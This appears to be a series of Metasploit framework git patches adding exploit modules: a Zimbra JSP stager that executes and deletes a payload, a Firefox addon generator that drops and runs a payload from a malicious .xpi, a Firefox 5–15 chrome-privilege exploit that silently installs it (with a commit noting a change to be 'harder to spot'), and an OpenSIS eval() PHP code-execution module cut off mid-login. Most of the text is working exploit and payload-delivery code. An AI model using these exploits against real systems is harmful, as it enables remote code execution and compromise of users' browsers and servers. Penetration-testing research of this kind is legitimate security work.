generate_payload_exe #upload payload - print_status("#{peer} - Uploading .JSP stager and payload") post_data = Rex::MIME::Message.new post_data.add_part("#{payload_name}", nil, nil, "form-data; name=\"filename1\"") @@ -218,6 +227,46 @@ class Metasploit3 < Msf::Exploit::Remote }) end + def build_soap_req(zimbra_user, zimbra_pass) + xml = Document.new + soap_var = "ns1:AuthRequest" + + xml.add_element( + "soapenv:Envelope", + { + 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", + 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", + 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", + 'xmlns:ser' => "http://service.emulation.ws.mercury.com", + 'xmlns:env' => "http://www.w3.org/2003/05/soap-envelope", + 'xmlns:ns1' => "urn:zimbraAdmin", + 'xmlns:ns2' => "urn:zimbraAdmin", + }) + + xml.root.add_element("soapenv:Header") + xml.root.add_element("soapenv:Body") + + header = xml.root.elements[1] + body = xml.root.elements[2] + + header.add_element("ns2:context") + body.add_element("ns1:AuthRequest") + + ns1 = body.elements[1] + ns1.add_element( + "account", + { + 'by' => "name" + }) + + ns1.add_element("password") + + ns1.elements["account"].text = "#{zimbra_user}" + ns1.elements["password"].text = "#{zimbra_pass}" + + return xml.to_s + end + def gen_stager(payload_name) stager = "<%@ page import=\"java.util.*,java.io.*\"%>" stager += " <%" @@ -228,6 +277,7 @@ class Metasploit3 < Msf::Exploit::Remote stager += " Runtime.getRuntime().exec(\"chmod 700 \" + payload);" stager += " Runtime.getRuntime().exec(\"bash -c '\" + payload + \"'\");" stager += " Runtime.getRuntime().exec(\"rm \" + jspfile);" + stager += " Runtime.getRuntime().exec(\"rm \" + payload);" stager += "%>" return stager end From c4b81786632c72dedb58290e9a01bd1adeea97dc Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 18 Dec 2013 14:06:45 -0600 Subject: [PATCH 092/205] Correct camelCase of YouTube --- modules/post/multi/manage/play_youtube.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/post/multi/manage/play_youtube.rb b/modules/post/multi/manage/play_youtube.rb index 1426bbc657..db5b645ffe 100644 --- a/modules/post/multi/manage/play_youtube.rb +++ b/modules/post/multi/manage/play_youtube.rb @@ -11,11 +11,11 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Multi Manage Youtube Broadcast', + 'Name' => 'Multi Manage YouTube Broadcast', 'Description' => %q{ - This module will broadcast a Youtube video on specified compromised systems. It will play + This module will broadcast a YouTube video on specified compromised systems. It will play the video in the target machine's native browser in full screen mode. The VID datastore - option is the "v" parameter in a Youtube video's URL. + option is the "v" parameter in a YouTube video's URL. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Post register_options( [ - OptString.new('VID', [true, 'The video ID to the Youtube video']) + OptString.new('VID', [true, 'The video ID to the YouTube video']) ], self.class) end From 0f56579765903c1a38653315b47c208ff5e388c0 Mon Sep 17 00:00:00 2001 From: Ramon de C Valle Date: Wed, 18 Dec 2013 18:14:51 -0200 Subject: [PATCH 093/205] Add the Gemfile.lock file --- Gemfile.lock | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Gemfile.lock b/Gemfile.lock index d7b1bd88e7..2975832f62 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,6 +13,7 @@ GEM i18n (~> 0.6, >= 0.6.4) multi_json (~> 1.0) arel (3.0.2) + bcrypt-ruby (3.1.2) builder (3.0.4) database_cleaner (1.1.1) diff-lcs (1.2.4) @@ -61,6 +62,7 @@ PLATFORMS DEPENDENCIES activerecord activesupport (>= 3.0.0) + bcrypt-ruby database_cleaner factory_girl (>= 4.1.0) fivemat (= 1.2.1) From 1235615f5f3d95b17e75f1a86ddd12a31316ed3d Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Wed, 18 Dec 2013 14:30:35 -0600 Subject: [PATCH 094/205] Add firefox 15 chrome privilege exploit. * Moves the logic for generating a firefox addon into its own mixin * Updates the firefox_xpi_bootstrapped_addon module to use the mixin * Module only works if you move your mouse 1px in any direction. --- lib/msf/core/exploit/mixins.rb | 3 + .../exploit/remote/firefox_addon_generator.rb | 125 ++++++++++++++++++ .../browser/firefox_xpi_bootstrapped_addon.rb | 108 +-------------- 3 files changed, 130 insertions(+), 106 deletions(-) create mode 100644 lib/msf/core/exploit/remote/firefox_addon_generator.rb diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index 1da0a5a5a1..d1bd31a508 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -98,4 +98,7 @@ require 'msf/core/exploit/winrm' # WebApp require 'msf/core/exploit/web' +# Firefox addons +require 'msf/core/exploit/remote/firefox_addon_generator' + require 'msf/core/exploit/remote/browser_exploit_server' diff --git a/lib/msf/core/exploit/remote/firefox_addon_generator.rb b/lib/msf/core/exploit/remote/firefox_addon_generator.rb new file mode 100644 index 0000000000..95ada5c855 --- /dev/null +++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb @@ -0,0 +1,125 @@ +# -*- coding: binary -*- + +### +# +# The FirefoxAddonGenerator allows a firefox exploit module to serve a malicious .xpi +# addon that will gain a session. +# +### + + +module Msf +module Exploit::Remote::FirefoxAddonGenerator + + # @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the + # 'application/x-xpinstall' MIME type + def generate_addon_xpi + # If we haven't returned yet, then this is a request for our xpi, + # so build one + + if target.name == 'Generic (Java Payload)' + jar = p.encoded_jar + jar.build_manifest(:main_class => "metasploit.Payload") + payload_file = jar.pack + payload_name='payload.jar' + payload_script=%q| + var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java + java.lang.System.setSecurityManager(null); + var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]); + var m = cl.loadClass("metasploit.Payload").getMethod("main", [java.lang.Class.forName("[Ljava.lang.String;")]); + m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]); + | + else + payload_file = generate_payload_exe + payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe' + payload_script=%q| + var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess); + process.init(tmp); + process.run(false,[],0); + | + if target.name != 'Windows x86 (Native Payload)' + payload_script = %q| + var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile); + chmod.initWithPath("/bin/chmod"); + var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess); + process.init(chmod); + process.run(true, ["+x", tmp.path], 2); + | + payload_script + end + end + + zip = Rex::Zip::Archive.new + xpi_guid = Rex::Text.rand_guid + bootstrap_script = %q| +function startup(data, reason) { + var file = Components.classes["@mozilla.org/file/directory_service;1"]. + getService(Components.interfaces.nsIProperties). + get("ProfD", Components.interfaces.nsIFile); + file.append("extensions"); + | + bootstrap_script << %Q|xpi_guid="#{xpi_guid}";| + bootstrap_script << %Q|payload_name="#{payload_name}";| + bootstrap_script << %q| + file.append(xpi_guid); + file.append(payload_name); + var tmp = Components.classes["@mozilla.org/file/directory_service;1"]. + getService(Components.interfaces.nsIProperties). + get("TmpD", Components.interfaces.nsIFile); + tmp.append(payload_name); + tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666); + file.copyTo(tmp.parent, tmp.leafName); + | + bootstrap_script << payload_script + + if (datastore['AutoUninstall']) + bootstrap_script << %q| + try { // Fx < 4.0 + Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid); + } catch (e) {} + try { // Fx 4.0 and later + Components.utils.import("resource://gre/modules/AddonManager.jsm"); + AddonManager.getAddonByID(xpi_guid, function(addon) { + addon.uninstall(); + }); + } catch (e) {} + | + end + + bootstrap_script << "}" + + zip.add_file('bootstrap.js', bootstrap_script) + zip.add_file(payload_name, payload_file) + zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n") + zip.add_file('install.rdf', %Q| + + + #{xpi_guid} + #{datastore['ADDONNAME']} + 1.0 + true + true + + + toolkit@mozilla.org + 1.0 + * + + + + + {ec8030f7-c20a-464f-9b0e-13a3a9e97384} + 1.0 + * + + + +|) + zip.add_file('overlay.xul', %q| + + +|) + zip + end +end +end \ No newline at end of file diff --git a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb index 5c05cd2fd0..27cb92014d 100644 --- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb +++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb @@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE + include Msf::Exploit::Remote::Browser::FirefoxAddonGenerator def initialize( info = {} ) super( update_info( info, @@ -109,114 +110,9 @@ class Metasploit3 < Msf::Exploit::Remote return end - # If we haven't returned yet, then this is a request for our xpi, - # so build one - - if target.name == 'Generic (Java Payload)' - jar = p.encoded_jar - jar.build_manifest(:main_class => "metasploit.Payload") - payload_file = jar.pack - payload_name='payload.jar' - payload_script=%q| - var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java - java.lang.System.setSecurityManager(null); - var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]); - var m = cl.loadClass("metasploit.Payload").getMethod("main", [java.lang.Class.forName("[Ljava.lang.String;")]); - m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]); - | - else - payload_file = generate_payload_exe - payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe' - payload_script=%q| - var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess); - process.init(tmp); - process.run(false,[],0); - | - if target.name != 'Windows x86 (Native Payload)' - payload_script = %q| - var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile); - chmod.initWithPath("/bin/chmod"); - var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess); - process.init(chmod); - process.run(true, ["+x", tmp.path], 2); - | + payload_script - end - end - - zip = Rex::Zip::Archive.new - xpi_guid = Rex::Text.rand_guid - bootstrap_script = %q| -function startup(data, reason) { - var file = Components.classes["@mozilla.org/file/directory_service;1"]. - getService(Components.interfaces.nsIProperties). - get("ProfD", Components.interfaces.nsIFile); - file.append("extensions"); - | - bootstrap_script << %Q|xpi_guid="#{xpi_guid}";| - bootstrap_script << %Q|payload_name="#{payload_name}";| - bootstrap_script << %q| - file.append(xpi_guid); - file.append(payload_name); - var tmp = Components.classes["@mozilla.org/file/directory_service;1"]. - getService(Components.interfaces.nsIProperties). - get("TmpD", Components.interfaces.nsIFile); - tmp.append(payload_name); - tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666); - file.copyTo(tmp.parent, tmp.leafName); - | - bootstrap_script << payload_script - - if (datastore['AutoUninstall']) - bootstrap_script << %q| - try { // Fx < 4.0 - Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid); - } catch (e) {} - try { // Fx 4.0 and later - Components.utils.import("resource://gre/modules/AddonManager.jsm"); - AddonManager.getAddonByID(xpi_guid, function(addon) { - addon.uninstall(); - }); - } catch (e) {} - | - end - - bootstrap_script << "}" - - zip.add_file('bootstrap.js', bootstrap_script) - zip.add_file(payload_name, payload_file) - zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n") - zip.add_file('install.rdf', %Q| - - - #{xpi_guid} - #{datastore['ADDONNAME']} - 1.0 - true - true - - - toolkit@mozilla.org - 1.0 - * - - - - - {ec8030f7-c20a-464f-9b0e-13a3a9e97384} - 1.0 - * - - - -|) -zip.add_file('overlay.xul', %q| - - -|) print_status("Sending xpi and waiting for user to click 'accept'...") - send_response( cli, zip.pack, { 'Content-Type' => 'application/x-xpinstall' } ) + send_response( cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' } ) handler( cli ) end From ca2de73879060b85fb1a5de5eafe2f8673a2a18f Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Wed, 18 Dec 2013 14:31:42 -0600 Subject: [PATCH 095/205] It helps to actually commit the exploit. --- .../browser/firefox_proto_crmfrequest.rb | 127 ++++++++++++++++++ 1 file changed, 127 insertions(+) create mode 100644 modules/exploits/multi/browser/firefox_proto_crmfrequest.rb diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb new file mode 100644 index 0000000000..b6ce346644 --- /dev/null +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -0,0 +1,127 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + include Msf::Exploit::Remote::FirefoxAddonGenerator + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Firefox < 15 exposedProps XCS Code Execution', + 'Description' => %q{ + On versions of Firefox before 15.0, the InstallTrigger object, when given + invalid input, would throw an exception that did not have an __exposedProps__ + property set. By re-setting the property on the exception's prototype, + the chrome-based defineProperty method is made available. + + With the defineProperty method, an overriden callback can be defined + that gets called from chrome-privileged context. From here, another + vulnerability is used to "peek" into the context's private scope. Unfortunately + the "good" parts of Components.classes are not available (we don't have a + chrome:// URL), so instead the AddonManager API is invoked to silently install + a malicious plugin. + + Note: this exploit requires the user move their mouse at least 1px inside of + the browser window. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'joev' ], + 'Platform' => %w{ java linux osx solaris win }, + 'Targets' => + [ + [ 'Generic (Java Payload)', + { + 'Platform' => ['java'], + 'Arch' => ARCH_JAVA + } + ], + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86, + } + ], + [ 'Linux x86 (Native Payload)', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + } + ], + [ 'Mac OS X PPC (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_PPC, + } + ], + [ 'Mac OS X x86 (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + } + ] + ], + 'DefaultTarget' => 1 + )) + + register_options( + [ + OptString.new('CONTENT', [ false, "Content to display inside the HTML .", '' ] ) + ], Auxiliary::Timed) + + end + + def exploit + super + end + + def on_request_uri(cli, request) + if request.uri.match(/\.xpi$/i) + send_response( cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' } ) + else + send_response_html(cli, generate_html) + end + end + + def generate_html + %Q| + + +#{datastore['CONTENT']} + + + + + + | + end +end From 64273fe41da6365836164ad789859058cc55c0f6 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Wed, 18 Dec 2013 14:42:01 -0600 Subject: [PATCH 096/205] Move addon datastore options into mixin. --- .../exploit/remote/firefox_addon_generator.rb | 42 ++++++++++++++++ .../browser/firefox_proto_crmfrequest.rb | 47 +++--------------- .../browser/firefox_xpi_bootstrapped_addon.rb | 49 +------------------ 3 files changed, 49 insertions(+), 89 deletions(-) diff --git a/lib/msf/core/exploit/remote/firefox_addon_generator.rb b/lib/msf/core/exploit/remote/firefox_addon_generator.rb index 95ada5c855..cc4d86d6e7 100644 --- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb +++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb @@ -11,6 +11,48 @@ module Msf module Exploit::Remote::FirefoxAddonGenerator + # Add in the supported datastore options + def initialize( info = {} ) + super(update_info(info, + 'Platform' => %w{ java linux osx solaris win }, + 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => + [ + [ 'Generic (Java Payload)', + { + 'Platform' => ['java'], + 'Arch' => ARCH_JAVA + } + ], + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86, + } + ], + [ 'Linux x86 (Native Payload)', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + } + ], + [ 'Mac OS X PPC (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_PPC, + } + ], + [ 'Mac OS X x86 (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + } + ] + ], + 'DefaultTarget' => 1 + )) + end + # @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the # 'application/x-xpinstall' MIME type def generate_addon_xpi diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb index b6ce346644..e36793c09e 100644 --- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -31,49 +31,13 @@ class Metasploit3 < Msf::Exploit::Remote Note: this exploit requires the user move their mouse at least 1px inside of the browser window. }, - 'License' => MSF_LICENSE, - 'Author' => [ 'joev' ], - 'Platform' => %w{ java linux osx solaris win }, - 'Targets' => - [ - [ 'Generic (Java Payload)', - { - 'Platform' => ['java'], - 'Arch' => ARCH_JAVA - } - ], - [ 'Windows x86 (Native Payload)', - { - 'Platform' => 'win', - 'Arch' => ARCH_X86, - } - ], - [ 'Linux x86 (Native Payload)', - { - 'Platform' => 'linux', - 'Arch' => ARCH_X86, - } - ], - [ 'Mac OS X PPC (Native Payload)', - { - 'Platform' => 'osx', - 'Arch' => ARCH_PPC, - } - ], - [ 'Mac OS X x86 (Native Payload)', - { - 'Platform' => 'osx', - 'Arch' => ARCH_X86, - } - ] - ], - 'DefaultTarget' => 1 + 'License' => MSF_LICENSE, + 'Author' => [ 'joev' ] )) - register_options( - [ - OptString.new('CONTENT', [ false, "Content to display inside the HTML .", '' ] ) - ], Auxiliary::Timed) + register_options([ + OptString.new('CONTENT', [ false, "Content to display inside the HTML .", '' ] ) + ], self.class) end @@ -101,6 +65,7 @@ if (!window.AddonManager.found) { function(install) { install.install() }, 'application/x-xpinstall' ); + window.AddonManager.found = true; } - | From f4113135053aa1e867375381210e781aa657fcb2 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Wed, 18 Dec 2013 20:31:31 -0600 Subject: [PATCH 110/205] Tidy whitespace. --- lib/msf/core/exploit/remote/firefox_addon_generator.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/remote/firefox_addon_generator.rb b/lib/msf/core/exploit/remote/firefox_addon_generator.rb index e4e7615315..fe4fe622a4 100644 --- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb +++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb @@ -7,7 +7,6 @@ # ### - module Msf module Exploit::Remote::FirefoxAddonGenerator @@ -175,4 +174,4 @@ function startup(data, reason) { zip end end -end \ No newline at end of file +end From 23b5254ea1a5bb5ea1e57fdc2a26f35772ba6d96 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Wed, 18 Dec 2013 20:35:43 -0600 Subject: [PATCH 111/205] Fix include reference. --- .../exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb index 725ad58a32..9a83e99066 100644 --- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb +++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb @@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE - include Msf::Exploit::Remote::Browser::FirefoxAddonGenerator + include Msf::Exploit::Remote::FirefoxAddonGenerator def initialize( info = {} ) super( update_info( info, @@ -63,7 +63,6 @@ class Metasploit3 < Msf::Exploit::Remote return end - print_status("Sending xpi and waiting for user to click 'accept'...") send_response( cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' } ) handler( cli ) From cb390bee7d3e1745fa9bb96c4220f9edeb3884dd Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Wed, 18 Dec 2013 20:37:33 -0600 Subject: [PATCH 112/205] Move comment. --- lib/msf/core/exploit/remote/firefox_addon_generator.rb | 3 --- .../exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb | 2 ++ 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/exploit/remote/firefox_addon_generator.rb b/lib/msf/core/exploit/remote/firefox_addon_generator.rb index fe4fe622a4..85d3d879db 100644 --- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb +++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb @@ -66,9 +66,6 @@ module Exploit::Remote::FirefoxAddonGenerator # @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the # 'application/x-xpinstall' MIME type def generate_addon_xpi - # If we haven't returned yet, then this is a request for our xpi, - # so build one - if target.name == 'Generic (Java Payload)' jar = p.encoded_jar jar.build_manifest(:main_class => "metasploit.Payload") diff --git a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb index 9a83e99066..fde97006f6 100644 --- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb +++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb @@ -54,6 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote return end + # If we haven't returned yet, then this is a request for our xpi, + # so build one p = regenerate_payload(cli) if not p print_error("Failed to generate the payload.") From 8d183d8afcf729209a27c5ba64bbb4ce2457dd42 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Wed, 18 Dec 2013 20:57:47 -0600 Subject: [PATCH 113/205] Update versions, 4.0.1 does not work on windows. --- modules/exploits/multi/browser/firefox_proto_crmfrequest.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb index 70e6b0f68d..1de2fc67d3 100644 --- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -14,9 +14,9 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Firefox 3.5 - 14.0.1 __exposedProps__ XCS Code Execution', + 'Name' => 'Firefox 5.0 - 14.0.1 __exposedProps__ XCS Code Execution', 'Description' => %q{ - On versions of Firefox from 3.5 to 14.0.1, the InstallTrigger global, when given + On versions of Firefox from 5.0 to 14.0.1, the InstallTrigger global, when given invalid input, would throw an exception that did not have an __exposedProps__ property set. By re-setting this property on the exception object's prototype, the chrome-based defineProperty method is made available. From 2add2acc8f1886a91287cb5d980a86c8b7bb9e15 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Wed, 18 Dec 2013 21:02:23 -0600 Subject: [PATCH 114/205] Use a smaller key size, harder to spot. --- modules/exploits/multi/browser/firefox_proto_crmfrequest.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb index 1de2fc67d3..08ed354fd6 100644 --- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -78,7 +78,7 @@ var register = function(obj,key) { var runme = function(){ if (q) return; q = true; - window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 1024, null, "rsa-ex"); + window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex"); }; try { p.constructor.defineProperty(obj,key,{get:runme}); From 5ee6c7790187d44a798789c461f55473f5452810 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Thu, 19 Dec 2013 02:05:45 -0600 Subject: [PATCH 115/205] Add a patch for 15.x support. * Also add authors i forgot, oops --- .../browser/firefox_proto_crmfrequest.rb | 87 +++++++++++-------- 1 file changed, 51 insertions(+), 36 deletions(-) diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb index 08ed354fd6..b7ba619c9a 100644 --- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -29,7 +29,11 @@ class Metasploit3 < Msf::Exploit::Remote API is invoked to silently install a malicious plugin. }, 'License' => MSF_LICENSE, - 'Author' => [ 'joev' ], + 'Author' => [ + 'Mariusz Mlynski', # discovered CVE-2012-3993 + 'moz_bug_r_a4', # discovered CVE-2013-1710 + 'joev' # metasploit module + ], 'References' => [ ['CVE', '2012-3993'], # used to install function that gets called from chrome:// (ff<15) ['OSVDB', '86111'], @@ -54,41 +58,52 @@ class Metasploit3 < Msf::Exploit::Remote def generate_html %Q| - - -#{datastore['CONTENT']} - - - - + + + #{datastore['CONTENT']} + + + + | end end From eb08a30293a7cb29f674bfe2e8bf87aa654aa25b Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Thu, 19 Dec 2013 02:08:55 -0600 Subject: [PATCH 116/205] Update description with new version support. --- modules/exploits/multi/browser/firefox_proto_crmfrequest.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb index b7ba619c9a..3d7ccf0dd2 100644 --- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -14,9 +14,9 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Firefox 5.0 - 14.0.1 __exposedProps__ XCS Code Execution', + 'Name' => 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution', 'Description' => %q{ - On versions of Firefox from 5.0 to 14.0.1, the InstallTrigger global, when given + On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given invalid input, would throw an exception that did not have an __exposedProps__ property set. By re-setting this property on the exception object's prototype, the chrome-based defineProperty method is made available. From fc2da15c87de45fee083f2798846505b11b69e16 Mon Sep 17 00:00:00 2001 From: bcoles Date: Thu, 19 Dec 2013 19:10:48 +1030 Subject: [PATCH 117/205] Add OpenSIS 'modname' PHP Code Execution module for CVE-2013-1349 --- .../unix/webapp/opensis_modname_exec.rb | 157 ++++++++++++++++++ 1 file changed, 157 insertions(+) create mode 100644 modules/exploits/unix/webapp/opensis_modname_exec.rb diff --git a/modules/exploits/unix/webapp/opensis_modname_exec.rb b/modules/exploits/unix/webapp/opensis_modname_exec.rb new file mode 100644 index 0000000000..010dc0040d --- /dev/null +++ b/modules/exploits/unix/webapp/opensis_modname_exec.rb @@ -0,0 +1,157 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "OpenSIS 'modname' PHP Code Execution", + 'Description' => %q{ + This module exploits a PHP code execution vulnerability in OpenSIS + versions 4.5 to 5.2 which allows any authenticated user to execute + arbitrary PHP code under the context of the web-server user. + The 'ajax.php' file calls 'eval()' with user controlled data from + the 'modname' parameter. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'EgiX', # Discovery + 'Brendan Coles ' # msf exploit + ], + 'References' => + [ + ['CVE', '2013-1349'], + ['URL', 'http://sourceforge.net/p/opensis-ce/bugs/59/'] + ], + 'Payload' => + { + 'BadChars' => "\x00\x0a\x0d", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic telnet bash netcat netcat-e perl ruby python', + } + }, + 'DefaultOptions' => + { + 'ExitFunction' => 'none' + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + # Tested on OpenSIS versions 4.9 and 5.2 (Ubuntu Linux) + ['OpenSIS version 4.5 to 5.2', { 'auto' => true }] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Dec 04 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI for OpenSIS', '/opensis/']), + OptString.new('USERNAME', [true, 'The username for OpenSIS', '']), + OptString.new('PASSWORD', [true, 'The password for OpenSIS', '']) + ], self.class) + end + + # + # Login + # + def login(user, pass) + @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};" + print_status("#{peer} - Authenticating as user '#{user}'") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "index.php"), + 'cookie' => @cookie, + 'vars_post' => Hash[{ + 'USERNAME' => user, + 'PASSWORD' => pass, + }.to_a.shuffle] + }) + if res and res.code == 200 and res.body =~ 